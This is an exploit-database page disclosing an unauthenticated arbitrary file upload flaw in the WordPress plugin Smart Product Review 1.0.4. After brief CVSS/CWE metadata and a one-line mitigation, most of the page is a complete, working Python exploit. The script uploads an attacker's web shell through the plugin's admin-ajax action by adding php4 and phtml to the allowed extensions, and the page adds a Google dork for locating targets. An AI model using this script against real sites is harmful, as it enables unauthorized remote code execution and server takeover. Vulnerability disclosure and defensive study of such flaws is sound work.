Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload

vendor:

Smart Product Review

by:

Keyvan Hardani

8.8

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: Smart Product Review

Affected Version From: 1.0.4

Affected Version To: 1.0.4

Patch Exists: YES

Related CWE:

CPE: a:codeflist:smart_product_review

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2021

WordPress Plugin Smart Product Review 1.0.4 – Arbitrary File Upload

Smart Product Review is a WordPress plugin developed by CodeFlip that allows users to add reviews to their products. The plugin version 1.0.4 is vulnerable to an arbitrary file upload vulnerability. An attacker can upload a malicious file to the server and gain remote code execution. This vulnerability can be exploited by an unauthenticated attacker.

Mitigation:

Upgrade to the latest version of the plugin.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload
# Google Dork: inurl: /wp-content/plugins/smart-product-review/
# Date: 16/11/2021
# Exploit Author: Keyvan Hardani
# Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/
# Version: <= 1.0.4
# Tested on: Kali Linux

import os.path
from os import path
import json
import requests;
import time
import sys

def banner():
    animation = "|/-\\"
    for i in range(20):
        time.sleep(0.1)
        sys.stdout.write("\r" + animation[i % len(animation)])
        sys.stdout.flush()
        #do something
    print("Smart Product Review 1.0.4 - Arbitrary File Upload")
    print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")

def usage():
	print("Usage: python3 exploit.py [target url] [your shell]")
	print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")

def vuln_check(uri):
	response = requests.get(uri)
	raw = response.text

	if ("No script kiddies please!!" in raw):
		return False;
	else:
		return True;

def main():

	banner()
	if(len(sys.argv) != 3):
		usage();
		sys.exit(1);

	base = sys.argv[1]
	file_path = sys.argv[2]

	ajax_action = 'sprw_file_upload_action'
	admin = '/wp-admin/admin-ajax.php';

	uri = base + admin + '?action=' + ajax_action ;
	check = vuln_check(uri);

	if(check == False):
		print("(*) Target not vulnerable!");
		sys.exit(1)

	if( path.isfile(file_path) == False):
		print("(*) Invalid file!")
		sys.exit(1)

	files = {'files[]' : open(file_path)}
	data = {
	"allowedExtensions[0]" : "jpg",
    "allowedExtensions[1]" : "php4",
    "allowedExtensions[2]" : "phtml",
    "allowedExtensions[3]" : "png",
	"qqfile" : "files",
    "element_id" : "6837",
    "sizeLimit" : "12000000",
    "file_uploader_nonce" : "2b102311b7"
	}
	print("Uploading Shell...");
	response = requests.post(uri, files=files, data=data )
	file_name = path.basename(file_path)
	if("ok" in response.text):
		print("Shell Uploaded!")
		print("Shell URL on your Review/Comment");
	else:
		print("Shell Upload Failed")
		sys.exit(1)

main();